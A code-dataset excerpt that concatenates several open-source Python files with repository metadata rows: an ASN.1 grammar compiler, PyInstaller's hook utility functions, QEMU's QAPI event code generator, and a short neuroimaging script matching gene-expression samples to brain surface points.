'extension_addition_alternatives_list : extension_addition_alternatives_list COMMA extension_addition_alternative'
t[0] = t[1] + [t[3]]
def p_extension_addition_alternative_1 (t):
'extension_addition_alternative : named_type'
t[0] = t[1]
def p_alternative_type_list_1 (t):
'alternative_type_list : named_type'
t[0] = [t[1]]
def p_alternative_type_list_2 (t):
'alternative_type_list : alternative_type_list COMMA named_type'
t[0] = t[1] + [t[3]]
def p_selection_type (t):
'selection_type : identifier LT type'
t[0] = Node ('seltype', ident = t[1], typ = t[3])
def p_tagged_type_1 (t):
'tagged_type : tag type'
t[0] = Tag (tag_typ = 'default', tag = t[1], typ = t[2])
def p_tagged_type_2 (t):
'tagged_type : tag IMPLICIT type'
t[0] = Tag (tag_typ = 'implicit', tag = t[1], typ = t[3])
def p_tagged_type_3 (t):
'tagged_type : tag EXPLICIT type'
t[0] = Tag (tag_typ = 'explicit', tag = t[1], typ = t[3])
def p_tag (t):
'tag : LBRACK class class_number RBRACK'
t[0] = Node ('tag', cls = t[2], num = int(t[3]))
# XXX should verify uniqueness of APPLICATION tags per-module
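# Hedged illustration (the ASN.1 fragment is an assumption, not from this file):
# a tagged type such as
#     Target ::= [APPLICATION 5] IMPLICIT OCTET STRING
# is parsed by the rules above into
#     Tag (tag_typ = 'implicit', tag = Node ('tag', cls = 'APPLICATION', num = 5),
#          typ = BaseType (val = 'OCTSTRING'))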
def p_class_number_1 (t):
'class_number : number'
t[0] = t[1]
def p_class_number_2 (t):
'class_number : defined_value'
t[0] = t[1]
def p_class_1 (t):
'''class : UNIVERSAL
| APPLICATION
| PRIVATE'''
t[0] = t[1]
def p_class_2 (t):
'''class : '''
t[0] = 'CONTEXT'
def p_any_type_1 (t):
'any_type : ANY'
t[0] = BaseType (val='ANY')
def p_any_type_2 (t):
'any_type : ANY DEFINED BY identifier'
t[0] = Literal (val='asn1.ANY_constr(def_by="%s")' % t[4]) # XXX
def p_oid_type (t):
'oid_type : OBJECT_IDENTIFIER'
t[0] = BaseType (val='OBJECT_IDENTIFIER') # XXX
def p_useful_type (t):
'''useful_type : GENERALIZEDTIME
| UTCTIME
| OBJECTDESCRIPTOR
| EXTERNAL'''
t[0] = BaseType (val = t[1])
def p_char_str_type (t):
'char_str_type : STRING_T'
t[0] = BaseType (val = t[1])
def p_sub_type_1 (t):
'sub_type : type subtype_spec'
t[0] = t[1]
t[0].subtype = t[2]
def p_sub_type_2 (t):
'sub_type : SET size_constraint OF type'
t[0] = Set_Of (val=t[4], subtype = t[2])
def p_sub_type_3 (t):
'sub_type : SEQUENCE size_constraint OF type'
t[0] = Sequence_Of (val = t[4], subtype = t[2])
def p_sub_type_4 (t):
'sub_type : SEQUENCE LPAREN size_constraint RPAREN OF type'
t[0] = Sequence_Of (val = t[6], subtype = t[3])
def p_subtype_spec_1 (t):
'subtype_spec : LPAREN subtype_val_set_list RPAREN'
t[0] = t[2]
def p_subtype_spec_2 (t):
'subtype_spec : LPAREN subtype_val_set_list COMMA ELLIPSIS RPAREN'
t[0] = t[2]
def p_subtype_val_set_list_1 (t):
'subtype_val_set_list : subtype_val_set'
t[0] = [t[1]]
def p_subtype_val_set_list_2 (t):
'subtype_val_set_list : subtype_val_set_list BAR subtype_val_set'
t[0] = t[1] + [t[3]]
def p_subtype_val_set (t):
'''subtype_val_set : single_value
| contained_subtype
| value_range
| permitted_alphabet
| size_constraint
| inner_type_constraints'''
t[0] = t[1]
def p_single_value (t):
'single_value : value'
t[0] = t[1]
def p_contained_subtype (t):
'contained_subtype : INCLUDES type'
t[0] = t[2]
def p_value_range (t):
'value_range : lower_end_point RANGE upper_end_point'
t[0] = ValueRange(lo=t[1], hi=t[3])
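# Hedged illustration (the example constraint is an assumption): a subtype such as
#     Octet ::= INTEGER (0..255)
# reaches p_value_range as ValueRange (lo = '0', hi = '255'); NUMBER tokens are
# passed through as lexer values, so lo/hi may well be strings here.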
def p_lower_end_point_1 (t):
'lower_end_point : lower_end_value '
t[0] = t[1]
def p_lower_end_point_2 (t):
'lower_end_point : lower_end_value LT' # XXX LT first?
t[0] = t[1] # but not inclusive range
def p_upper_end_point_1 (t):
'upper_end_point : upper_end_value'
t[0] = t[1]
def p_upper_end_point_2 (t):
'upper_end_point : LT upper_end_value'
t[0] = t[1] # but not inclusive range
def p_lower_end_value (t):
'''lower_end_value : value
| MIN'''
t[0] = t[1] # XXX
def p_upper_end_value (t):
'''upper_end_value : value
| MAX'''
t[0] = t[1]
def p_size_constraint (t):
'size_constraint : SIZE subtype_spec'
t[0] = Size(subtype = t[2])
def p_permitted_alphabet (t):
'permitted_alphabet : FROM subtype_spec'
t[0] = From(subtype = t[2])
def p_inner_type_constraints_1 (t):
'inner_type_constraints : WITH COMPONENT single_type_constraint'
t[0] = t[3]
def p_inner_type_constraints_2 (t):
'inner_type_constraints : WITH COMPONENTS multiple_type_constraints'
t[0] = t[3]
def p_single_type_constraint (t):
'single_type_constraint : subtype_spec'
t[0] = t[1]
# /* this constrains the elmt of setof or seq of */
def p_multiple_type_constraints (t):
'''multiple_type_constraints : full_specification
| partial_specification'''
t[0] = t[1]
def p_full_specification (t):
'full_specification : LBRACE type_constraints RBRACE'
t[0] = t[2]
def p_partial_specification (t):
'partial_specification : LBRACE ELLIPSIS COMMA type_constraints RBRACE'
t[0] = t[4]
def p_type_constraints_1 (t):
'type_constraints : named_constraint'
t[0] = [t[1]]
def p_type_constraints_2 (t):
'type_constraints : type_constraints COMMA named_constraint'
t[0] = t[1] + [t[3]]
def p_named_constraint_1 (t):
'named_constraint : identifier constraint'
t[0] = Node ('named_constraint', ident = t[1], constr = t[2])
def p_named_constraint_2 (t):
'named_constraint : constraint'
t[0] = Node ('named_constraint', constr = t[1])
def p_constraint (t):
'constraint : value_constraint presence_constraint'
t[0] = Node ('constraint', value = t[1], presence = t[2])
def p_value_constraint_1 (t):
'value_constraint : subtype_spec'
t[0] = t[1]
def p_value_constraint_2 (t):
'value_constraint : '
pass
def p_presence_constraint_1 (t):
'''presence_constraint : PRESENT
| ABSENT
| OPTIONAL'''
t[0] = t[1]
def p_presence_constraint_2 (t):
'''presence_constraint : '''
pass
# /*-----------------------------------------------------------------------*/
# /* Value Notation Productions */
# /*-----------------------------------------------------------------------*/
def p_value_assign (t):
'value_assign : identifier type GETS value'
t[0] = Node ('value_assign', ident = t[1], typ = t[2], val = t[4])
def p_value (t):
'''value : builtin_value
| defined_value'''
t[0] = t[1]
def p_defined_value(t):
'''defined_value : ext_val_ref
| identifier'''
t[0] = t[1]
def p_ext_val_ref (t):
'ext_val_ref : type_ref DOT identifier'
# XXX coerce type_ref to module_ref
t[0] = Node ('ext_val_ref', module = t[1], ident = t[3])
def p_builtin_value_1 (t):
'''builtin_value : boolean_val
| null_val
| special_real_val
| signed_number
| hex_string
| binary_string
| char_string''' # XXX we don't support {data} here
t[0] = t[1]
def p_boolean_val (t):
'''boolean_val : TRUE
| FALSE'''
t[0] = t[1]
def p_special_real_val (t):
'''special_real_val : PLUS_INFINITY
| MINUS_INFINITY'''
t[0] = t[1]
def p_null_val (t):
'null_val : NULL'
t[0] = t[1]
def p_named_value_1 (t):
'named_value : value'
t[0] = t[1]
def p_named_value_2 (t):
'named_value : identifier value'
t[0] = Node ('named_value', ident = t[1], value = t[2])
def p_oid_val (t):
'oid_val : LBRACE oid_comp_list RBRACE'
t[0] = t[2]
def p_oid_comp_list_1 (t):
'oid_comp_list : oid_comp_list oid_component'
t[0] = t[1] + [t[2]]
def p_oid_comp_list_2 (t):
'oid_comp_list : oid_component'
t[0] = [t[1]]
def p_oid_component (t):
'''oid_component : number_form
| name_form
| name_and_number_form'''
t[0] = t[1]
def p_number_form (t):
'number_form : NUMBER'
t[0] = t[1]
# Note that Z39.50 v3 spec has upper-case here for, e.g., SUTRS.
# I've hacked the grammar to be liberal about what it accepts.
# XXX should have -strict command-line flag to only accept lowercase
# here, since that's what X.208 says.
# XXX I've switched back, because this creates a shift/reduce conflict
# which causes PLY 1.2 and 1.3 to blow up: cope and hack your input files,
# or persuade ITU/ISO/whoever to provide correct specs.
def p_name_form (t):
'''name_form : type_ref'''
t[0] = t[1]
def p_name_and_number_form_1 (t):
'''name_and_number_form : identifier LPAREN number_form RPAREN
| type_ref LPAREN number_form RPAREN'''
t[0] = Node ('name_and_number', ident = t[1], number = t[3])
def p_name_and_number_form_2 (t):
'name_and_number_form : identifier LPAREN defined_value RPAREN'
t[0] = Node ('name_and_number', ident = t[1], val = t[3])
# see X.208 if you're dubious about lcase only for identifier
def p_identifier (t):
'identifier : LCASE_IDENT'
t[0] = t[1]
def p_binary_string (t):
'binary_string : BSTRING'
t[0] = t[1]
def p_hex_string (t):
'hex_string : HSTRING'
t[0] = t[1]
def p_char_string (t):
'char_string : QSTRING'
t[0] = t[1]
def p_number (t):
'number : NUMBER'
t[0] = t[1]
def p_type_ref (t):
'type_ref : UCASE_IDENT'
t[0] = Type_Ref (name=t[1])
def p_error(t):
raise ParseError (str(t))
yacc.yacc ()
# XXX should just calculate dependencies as we go along. Should be part of prepass, not
# a utility function all back-ends have to call.
def calc_dependencies (node, dict, trace = 0):
if not hasattr (node, '__dict__'):
if trace: print "#returning, node=", node
return
if node.type == 'Type_Ref': # XXX
dict [node.name] = 1
if trace: print "#Setting", node.name
return
for (a, val) in node.__dict__.items ():
if trace: print "# Testing node ", node, "attr", a, " val", val
if a[0] == '_':
continue
elif isinstance (val, type ([])):
for v in val:
calc_dependencies (v, dict, trace)
elif isinstance (val, Node):
calc_dependencies (val, dict, trace)
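# Hedged usage sketch (variable names are illustrative): given any Node
# returned by the parser, collect the Type_Ref names it depends on, e.g.
#     deps = {}
#     calc_dependencies (assign_node, deps)
#     print deps.keys ()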
def testlex (s, fn, dict):
lexer.input (s)
while 1:
token = lexer.token ()
if not token:
break
print token
import sys
if __name__ == '__main__':
defined_dict = {}
for fn in sys.argv [1:]:
f = open (fn, "r")
ast = yacc.parse (f.read())
print map (str, ast)
lexer.lineno = 1
|
seblefevre/testerman
|
plugins/codecs/ber/compiler.py
|
Python
|
gpl-2.0
| 29,456
|
[
"ASE"
] |
bfd9c6f515bd4c21a89617fe85f19a69d3b92a785c2d8896c90caef9a5c4f5a6
|
#-----------------------------------------------------------------------------
# Copyright (c) 2013, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
import glob
import os
import sys
import PyInstaller
import PyInstaller.compat as compat
from PyInstaller.compat import is_darwin
from PyInstaller.utils import misc
import PyInstaller.log as logging
logger = logging.getLogger(__name__)
def __exec_python_cmd(cmd):
"""
Executes an externally spawned Python interpreter and returns
anything that was emitted in the standard output as a single
string.
"""
# Prepend PYTHONPATH with pathex
pp = os.pathsep.join(PyInstaller.__pathex__)
old_pp = compat.getenv('PYTHONPATH')
if old_pp:
pp = os.pathsep.join([old_pp, pp])
compat.setenv("PYTHONPATH", pp)
try:
try:
txt = compat.exec_python(*cmd)
except OSError, e:
raise SystemExit("Execution failed: %s" % e)
finally:
if old_pp is not None:
compat.setenv("PYTHONPATH", old_pp)
else:
compat.unsetenv("PYTHONPATH")
return txt.strip()
def exec_statement(statement):
"""Executes a Python statement in an externally spawned interpreter, and
returns anything that was emitted in the standard output as a single string.
"""
cmd = ['-c', statement]
return __exec_python_cmd(cmd)
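# Hedged usage example (module name is illustrative); the spawned interpreter
# is Python 2, as in the other statements in this module, hence the print
# statement:
#     version = exec_statement('import sqlalchemy; print sqlalchemy.__version__')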
def exec_script(script_filename, *args):
"""
Executes a Python script in an externally spawned interpreter, and
returns anything that was emitted in the standard output as a
single string.
To prevent misuse, the script passed to hookutils.exec_script
must be located in the `hooks/utils` directory.
script_filename = os.path.join('utils', os.path.basename(script_filename))
script_filename = os.path.join(os.path.dirname(__file__), script_filename)
if not os.path.exists(script_filename):
raise SystemError("To prevent misuse, the script passed to "
"hookutils.exec_script must be located in "
"the `hooks/utils` directory.")
# Scripts might be importing some modules. Add PyInstaller code to pathex.
pyinstaller_root_dir = os.path.dirname(os.path.abspath(PyInstaller.__path__[0]))
PyInstaller.__pathex__.append(pyinstaller_root_dir)
cmd = [script_filename]
cmd.extend(args)
return __exec_python_cmd(cmd)
def eval_statement(statement):
txt = exec_statement(statement).strip()
if not txt:
# return an empty string which is "not true" but iterable
return ''
return eval(txt)
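# Note: eval_statement() eval()s whatever the child interpreter prints, so the
# statement should emit a Python literal. Hedged example (mirrors the real call
# in matplotlib_backends() below):
#     all_bk = eval_statement('import matplotlib; print matplotlib.rcsetup.all_backends')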
def eval_script(scriptfilename, *args):
txt = exec_script(scriptfilename, *args).strip()
if not txt:
# return an empty string which is "not true" but iterable
return ''
return eval(txt)
def get_pyextension_imports(modname):
"""
Return list of modules required by binary (C/C++) Python extension.
Python extension files end with .so (Unix) or .pyd (Windows).
It's almost impossible to analyze a binary extension and its dependencies,
and the module cannot be imported directly.
Let's at least try to import it in a subprocess and get the difference
in module list from sys.modules.
This function could be used for 'hiddenimports' in PyInstaller hooks files.
"""
statement = """
import sys
# Importing distutils filters common modules, especially in virtualenv.
import distutils
original_modlist = sys.modules.keys()
# When importing this module - sys.modules gets updated.
import %(modname)s
all_modlist = sys.modules.keys()
diff = set(all_modlist) - set(original_modlist)
# Module list contains the original modname. We do not need it there.
diff.discard('%(modname)s')
# Print module list to stdout.
print list(diff)
""" % {'modname': modname}
module_imports = eval_statement(statement)
if not module_imports:
logger.error('Cannot find imports for module %s' % modname)
return [] # Means no imports found or looking for imports failed.
#module_imports = filter(lambda x: not x.startswith('distutils'), module_imports)
return module_imports
def qt4_plugins_dir():
qt4_plugin_dirs = eval_statement(
"from PyQt4.QtCore import QCoreApplication;"
"app=QCoreApplication([]);"
"print map(unicode,app.libraryPaths())")
if not qt4_plugin_dirs:
logger.error("Cannot find PyQt4 plugin directories")
return ""
for d in qt4_plugin_dirs:
if os.path.isdir(d):
return str(d) # must be 8-bit chars for one-file builds
logger.error("Cannot find existing PyQt4 plugin directory")
return ""
def qt4_phonon_plugins_dir():
qt4_plugin_dirs = eval_statement(
"from PyQt4.QtGui import QApplication;"
"app=QApplication([]); app.setApplicationName('pyinstaller');"
"from PyQt4.phonon import Phonon;"
"v=Phonon.VideoPlayer(Phonon.VideoCategory);"
"print map(unicode,app.libraryPaths())")
if not qt4_plugin_dirs:
logger.error("Cannot find PyQt4 phonon plugin directories")
return ""
for d in qt4_plugin_dirs:
if os.path.isdir(d):
return str(d) # must be 8-bit chars for one-file builds
logger.error("Cannot find existing PyQt4 phonon plugin directory")
return ""
def qt4_plugins_binaries(plugin_type):
"""Return list of dynamic libraries formated for mod.binaries."""
binaries = []
pdir = qt4_plugins_dir()
files = misc.dlls_in_dir(os.path.join(pdir, plugin_type))
for f in files:
binaries.append((
os.path.join('qt4_plugins', plugin_type, os.path.basename(f)),
f, 'BINARY'))
return binaries
def qt4_menu_nib_dir():
"""Return path to Qt resource dir qt_menu.nib."""
menu_dir = ''
# Detect MacPorts prefix (usually /opt/local).
# Suppose that PyInstaller is using python from macports.
macports_prefix = sys.executable.split('/Library')[0]
# list of directories where to look for qt_menu.nib
dirs = [
# Qt4 from MacPorts not compiled as framework.
os.path.join(macports_prefix, 'lib', 'Resources'),
# Qt4 from MacPorts compiled as framework.
os.path.join(macports_prefix, 'libexec', 'qt4-mac', 'lib',
'QtGui.framework', 'Versions', '4', 'Resources'),
# Qt4 installed into default location.
'/Library/Frameworks/QtGui.framework/Resources',
'/Library/Frameworks/QtGui.framework/Versions/4/Resources',
'/Library/Frameworks/QtGui.Framework/Versions/Current/Resources',
]
# Qt4 from Homebrew compiled as framework
globpath = '/usr/local/Cellar/qt/4.*/lib/QtGui.framework/Versions/4/Resources'
qt_homebrew_dirs = glob.glob(globpath)
dirs += qt_homebrew_dirs
# Check directory existence
for d in dirs:
d = os.path.join(d, 'qt_menu.nib')
if os.path.exists(d):
menu_dir = d
break
if not menu_dir:
logger.error('Cannot find qt_menu.nib directory')
return menu_dir
def django_dottedstring_imports(django_root_dir):
"""
Get all the necessary Django modules specified in settings.py.
In the settings.py the modules are specified in several variables
as strings.
"""
package_name = os.path.basename(django_root_dir)
compat.setenv('DJANGO_SETTINGS_MODULE', '%s.settings' % package_name)
# Extend PYTHONPATH with parent dir of django_root_dir.
PyInstaller.__pathex__.append(misc.get_path_to_toplevel_modules(django_root_dir))
# Extend PYTHONPATH with django_root_dir.
# Many times Django users do not specify absolute imports in the settings module.
PyInstaller.__pathex__.append(django_root_dir)
ret = eval_script('django-import-finder.py')
# Unset environment variables again.
compat.unsetenv('DJANGO_SETTINGS_MODULE')
return ret
def django_find_root_dir():
"""
Return path to directory (top-level Python package) that contains main django
files. Return None if no directory was detected.
The main Django project directory contains files like '__init__.py',
'settings.py' and 'urls.py'.
In Django 1.4+ the script 'manage.py' is not in the directory with 'settings.py'
but usually one level up. We need to detect this special case too.
"""
# Get the directory with manage.py. Manage.py is supplied to PyInstaller as the
# first main executable script.
manage_py = sys._PYI_SETTINGS['scripts'][0]
manage_dir = os.path.dirname(os.path.abspath(manage_py))
# Get the Django root directory, i.e. the directory that contains settings.py
# and urls.py. It could be the directory containing manage.py or any of its
# subdirectories.
settings_dir = None
files = set(os.listdir(manage_dir))
if 'settings.py' in files and 'urls.py' in files:
settings_dir = manage_dir
else:
for f in files:
if os.path.isdir(f):
subfiles = os.listdir(os.path.join(manage_dir, f))
# Subdirectory contains critical files.
if 'settings.py' in subfiles and 'urls.py' in subfiles:
settings_dir = os.path.join(manage_dir, f)
break # Find the first directory.
return settings_dir
def matplotlib_backends():
"""
Return matplotlib backends available in the current Python installation.
All matplotlib backends are hardcoded. We have to try to import them
and return the list of successfully imported backends.
"""
all_bk = eval_statement('import matplotlib; print matplotlib.rcsetup.all_backends')
avail_bk = []
import_statement = """
try:
__import__('matplotlib.backends.backend_%s')
except ImportError, e:
print str(e)
"""
# CocoaAgg backend causes subprocess to exit and thus detection
# is not reliable. This backend is meaningful only on Mac OS X.
if not is_darwin and 'CocoaAgg' in all_bk:
all_bk.remove('CocoaAgg')
# Try to import every backend in a subprocess.
for bk in all_bk:
stdout = exec_statement(import_statement % bk.lower())
# Backend import is successful if there is no text in stdout.
if not stdout:
avail_bk.append(bk)
# Convert backend name to module name.
# e.g. GTKAgg -> backend_gtkagg
return ['backend_' + x.lower() for x in avail_bk]
def opengl_arrays_modules():
"""
Return list of array modules for OpenGL module.
e.g. 'OpenGL.arrays.vbo'
"""
statement = 'import OpenGL; print OpenGL.__path__[0]'
opengl_mod_path = exec_statement(statement)
arrays_mod_path = os.path.join(opengl_mod_path, 'arrays')
files = glob.glob(arrays_mod_path + '/*.py')
modules = []
for f in files:
mod = os.path.splitext(os.path.basename(f))[0]
# Skip __init__ module.
if mod == '__init__':
continue
modules.append('OpenGL.arrays.' + mod)
return modules
def remove_prefix(string, prefix):
"""
This function removes the given prefix from a string, if the string does
indeed begin with the prefix; otherwise, it returns the string
unmodified.
"""
if string.startswith(prefix):
return string[len(prefix):]
else:
return string
def remove_suffix(string, suffix):
"""
This function removes the given suffix from a string, if the string
does indeed end with the suffix; otherwise, it returns the string
unmodified.
"""
# Special case: if suffix is empty, string[:0] returns ''. So, test
# for a non-empty suffix.
if suffix and string.endswith(suffix):
return string[:-len(suffix)]
else:
return string
def remove_file_extension(filename):
"""
This function returns filename without its extension.
"""
return os.path.splitext(filename)[0]
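# Hedged examples of the three helpers above:
#     remove_prefix('abc.def', 'abc')     -> '.def'
#     remove_suffix('abc.def', '.def')    -> 'abc'
#     remove_file_extension('mod.py')     -> 'mod'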
def get_module_file_attribute(package):
"""
Given a package name, return the value of its __file__ attribute.
In PyInstaller process we cannot import directly analyzed modules.
"""
# Statement to return __file__ attribute of a package.
__file__statement = """
# Fun Python behavior: __import__('mod.submod') returns mod,
# whereas __import__('mod.submod', fromlist = [a non-empty list])
# returns mod.submod. See the docs on `__import__
# <http://docs.python.org/library/functions.html#__import__>`_.
# Keyword arguments in the __import__ function are available
# in Python 2.5+. Compatibility with Python 2.4 is preserved.
_fromlist = ['']
_globals = {}
_locals = {}
package = __import__('%s', _globals, _locals, _fromlist)
print package.__file__
"""
return exec_statement(__file__statement % package)
def get_package_paths(package):
"""
Given a package, return the path to packages stored on this machine
and also returns the path to this particular package. For example,
if pkg.subpkg lives in /abs/path/to/python/libs, then this function
returns (/abs/path/to/python/libs,
/abs/path/to/python/libs/pkg/subpkg).
"""
# A package must have a path -- check for this, in case the package
# parameter is actually a module.
is_pkg_statement = 'import %s as p; print hasattr(p, "__path__")'
is_package = eval_statement(is_pkg_statement % package)
assert is_package
file_attr = get_module_file_attribute(package)
# package.__file__ = /abs/path/to/package/subpackage/__init__.py.
# Search for Python files in /abs/path/to/package/subpackage; pkg_dir
# stores this path.
pkg_dir = os.path.dirname(file_attr)
# When found, remove /abs/path/to/ from the filename; mod_base stores
# this path to be removed.
pkg_base = remove_suffix(pkg_dir, package.replace('.', os.sep))
return pkg_base, pkg_dir
# All these extension represent Python modules or extension modules
PY_EXECUTABLE_EXTENSIONS = set(['.py', '.pyc', '.pyd', '.pyo', '.so'])
def collect_submodules(package):
"""
The following two functions were originally written by Ryan Welsh
(welchr AT umich.edu).
This produces a list of strings which specify all the modules in
package. Its results can be directly assigned to ``hiddenimports``
in a hook script; see, for example, hook-sphinx.py. The
package parameter must be a string which names the package.
This function does not work on zipped Python eggs.
This function is used only for hook scripts, but not by the body of
PyInstaller.
"""
pkg_base, pkg_dir = get_package_paths(package)
# Walk through all files in the given package, looking for submodules.
mods = set()
for dirpath, dirnames, filenames in os.walk(pkg_dir):
# Change from OS separators to a dotted Python module path,
# removing the path up to the package's name. For example,
# '/abs/path/to/desired_package/sub_package' becomes
# 'desired_package.sub_package'
mod_path = remove_prefix(dirpath, pkg_base).replace(os.sep, ".")
# If this subdirectory is a package, add it and all other .py
# files in this subdirectory to the list of modules.
if '__init__.py' in filenames:
mods.add(mod_path)
for f in filenames:
extension = os.path.splitext(f)[1]
if ((remove_file_extension(f) != '__init__') and
extension in PY_EXECUTABLE_EXTENSIONS):
mods.add(mod_path + "." + remove_file_extension(f))
else:
# If not, nothing here is part of the package; don't visit any of
# these subdirs.
del dirnames[:]
return list(mods)
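# Hedged usage sketch, mirroring the docstring (package name is illustrative):
# a hook script would typically do
#     hiddenimports = collect_submodules('sphinx')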
# These extensions represent Python modules or compiled extension modules and
# should therefore be ignored when collecting data files.
PY_IGNORE_EXTENSIONS = set(['.py', '.pyc', '.pyd', '.pyo', '.so', '.dylib'])
def collect_data_files(package):
"""
This routine produces a list of (source, dest) non-Python (i.e. data)
files which reside in package. Its results can be directly assigned to
``datas`` in a hook script; see, for example, hook-sphinx.py. The
package parameter must be a string which names the package.
This function does not work on zipped Python eggs.
This function is used only for hook scripts, but not by the body of
PyInstaller.
"""
pkg_base, pkg_dir = get_package_paths(package)
# Walk through all files in the given package, looking for data files.
datas = []
for dirpath, dirnames, files in os.walk(pkg_dir):
for f in files:
extension = os.path.splitext(f)[1]
if extension not in PY_IGNORE_EXTENSIONS:
# Produce the tuple
# (/abs/path/to/source/mod/submod/file.dat,
# mod/submod/file.dat)
source = os.path.join(dirpath, f)
dest = remove_prefix(dirpath,
os.path.dirname(pkg_base) + os.sep)
datas.append((source, dest))
return datas
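# Hedged usage sketch (package name is illustrative): in a hook script,
#     datas = collect_data_files('sphinx')
# yields (source, dest) tuples ready to assign to ``datas``.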
|
TeamSWAP/swap
|
external/pyinstaller/PyInstaller/hooks/hookutils.py
|
Python
|
apache-2.0
| 17,250
|
[
"VisIt"
] |
9aa7aaf4dbf54f1a058131d8e9657b97c4d19f95d6760fe4600cb7867a3a746a
|
#
# QAPI event generator
#
# Copyright (c) 2014 Wenchao Xia
# Copyright (c) 2015-2016 Red Hat Inc.
#
# Authors:
# Wenchao Xia <wenchaoqemu@gmail.com>
# Markus Armbruster <armbru@redhat.com>
#
# This work is licensed under the terms of the GNU GPL, version 2.
# See the COPYING file in the top-level directory.
from qapi import *
def gen_event_send_proto(name, arg_type, boxed):
return 'void qapi_event_send_%(c_name)s(%(param)s)' % {
'c_name': c_name(name.lower()),
'param': gen_params(arg_type, boxed, 'Error **errp')}
def gen_event_send_decl(name, arg_type, boxed):
return mcgen('''
%(proto)s;
''',
proto=gen_event_send_proto(name, arg_type, boxed))
# Declare and initialize an object 'qapi' using parameters from gen_params()
def gen_param_var(typ):
assert not typ.variants
ret = mcgen('''
%(c_name)s param = {
''',
c_name=typ.c_name())
sep = ' '
for memb in typ.members:
ret += sep
sep = ', '
if memb.optional:
ret += 'has_' + c_name(memb.name) + sep
if memb.type.name == 'str':
# Cast away const added in gen_params()
ret += '(char *)'
ret += c_name(memb.name)
ret += mcgen('''
};
''')
if not typ.is_implicit():
ret += mcgen('''
%(c_name)s *arg = &param;
''',
c_name=typ.c_name())
return ret
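# Hedged illustration (type and member names are assumptions): for a
# non-implicit struct 'Foo' with a 'str' member 'id' and an optional 'int'
# member 'count', gen_param_var() emits C roughly like
#     Foo param = {
#         (char *)id, has_count, count
#     };
#     Foo *arg = &param;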
def gen_event_send(name, arg_type, boxed):
# FIXME: Our declaration of local variables (and of 'errp' in the
# parameter list) can collide with exploded members of the event's
# data type passed in as parameters. If this collision ever hits in
# practice, we can rename our local variables with a leading _ prefix,
# or split the code into a wrapper function that creates a boxed
# 'param' object then calls another to do the real work.
ret = mcgen('''
%(proto)s
{
QDict *qmp;
Error *err = NULL;
QMPEventFuncEmit emit;
''',
proto=gen_event_send_proto(name, arg_type, boxed))
if arg_type and not arg_type.is_empty():
ret += mcgen('''
QObject *obj;
Visitor *v;
''')
if not boxed:
ret += gen_param_var(arg_type)
else:
assert not boxed
ret += mcgen('''
emit = qmp_event_get_func_emit();
if (!emit) {
return;
}
qmp = qmp_event_build_dict("%(name)s");
''',
name=name)
if arg_type and not arg_type.is_empty():
ret += mcgen('''
v = qobject_output_visitor_new(&obj);
''')
if not arg_type.is_implicit():
ret += mcgen('''
visit_type_%(c_name)s(v, "%(name)s", &arg, &err);
''',
name=name, c_name=arg_type.c_name())
else:
ret += mcgen('''
visit_start_struct(v, "%(name)s", NULL, 0, &err);
if (err) {
goto out;
}
visit_type_%(c_name)s_members(v, &param, &err);
if (!err) {
visit_check_struct(v, &err);
}
visit_end_struct(v, NULL);
''',
name=name, c_name=arg_type.c_name())
ret += mcgen('''
if (err) {
goto out;
}
visit_complete(v, &obj);
qdict_put_obj(qmp, "data", obj);
''')
ret += mcgen('''
emit(%(c_enum)s, qmp, &err);
''',
c_enum=c_enum_const(event_enum_name, name))
if arg_type and not arg_type.is_empty():
ret += mcgen('''
out:
visit_free(v);
''')
ret += mcgen('''
error_propagate(errp, err);
QDECREF(qmp);
}
''')
return ret
class QAPISchemaGenEventVisitor(QAPISchemaVisitor):
def __init__(self):
self.decl = None
self.defn = None
self._event_names = None
def visit_begin(self, schema):
self.decl = ''
self.defn = ''
self._event_names = []
def visit_end(self):
self.decl += gen_enum(event_enum_name, self._event_names)
self.defn += gen_enum_lookup(event_enum_name, self._event_names)
self._event_names = None
def visit_event(self, name, info, arg_type, boxed):
self.decl += gen_event_send_decl(name, arg_type, boxed)
self.defn += gen_event_send(name, arg_type, boxed)
self._event_names.append(name)
(input_file, output_dir, do_c, do_h, prefix, dummy) = parse_command_line()
c_comment = '''
/*
* schema-defined QAPI event functions
*
* Copyright (c) 2014 Wenchao Xia
*
* Authors:
* Wenchao Xia <wenchaoqemu@gmail.com>
*
* This work is licensed under the terms of the GNU LGPL, version 2.1 or later.
* See the COPYING.LIB file in the top-level directory.
*
*/
'''
h_comment = '''
/*
* schema-defined QAPI event functions
*
* Copyright (c) 2014 Wenchao Xia
*
* Authors:
* Wenchao Xia <wenchaoqemu@gmail.com>
*
* This work is licensed under the terms of the GNU LGPL, version 2.1 or later.
* See the COPYING.LIB file in the top-level directory.
*
*/
'''
(fdef, fdecl) = open_output(output_dir, do_c, do_h, prefix,
'qapi-event.c', 'qapi-event.h',
c_comment, h_comment)
fdef.write(mcgen('''
#include "qemu/osdep.h"
#include "qemu-common.h"
#include "%(prefix)sqapi-event.h"
#include "%(prefix)sqapi-visit.h"
#include "qapi/qobject-output-visitor.h"
#include "qapi/qmp-event.h"
''',
prefix=prefix))
fdecl.write(mcgen('''
#include "qapi/error.h"
#include "qapi/qmp/qdict.h"
#include "%(prefix)sqapi-types.h"
''',
prefix=prefix))
event_enum_name = c_name(prefix + "QAPIEvent", protect=False)
schema = QAPISchema(input_file)
gen = QAPISchemaGenEventVisitor()
schema.visit(gen)
fdef.write(gen.defn)
fdecl.write(gen.decl)
close_output(fdef, fdecl)
|
gongleiarei/qemu
|
scripts/qapi-event.py
|
Python
|
gpl-2.0
| 5,702
|
[
"VisIt"
] |
28a8edd81c74c2353c05d83f1641724fa8e059fe6bd47125a9bf710a96663015
|
import os
import numpy as np
from scipy.io import loadmat
from mindboggle.utils.io_vtk import read_vtk
from mindboggle.utils.compute import point_distance
G = loadmat('/Users/arno/Dropbox/MB/data/allen/H0351.2002.mat')
values = G['expr']
gene_mni = G['mni']
path = os.environ['MINDBOGGLE_DATA']
genes = []
gene_values = []
for i in range(25):
print(i)
input_vtk = os.path.join(path, 'allen', 'labels_traveldepth' + str(i) + '.vtk')
if os.path.exists(input_vtk):
faces, lines, indices, points, npoints, depths, name, input_vtk = read_vtk(input_vtk)
I = [j for j, x in enumerate(depths) if x > -1]
gene = 0
value = 0
print(len(I))
points2 = np.array(points)
points2 = points2[I]
for point in points2:
mind, minI = point_distance(point, gene_mni)
if np.max(values[minI]) > value:
gene = minI
value = np.max(values[minI])
genes.append(gene)
gene_values.append(value)
else:
genes.append(0)
gene_values.append(0)
|
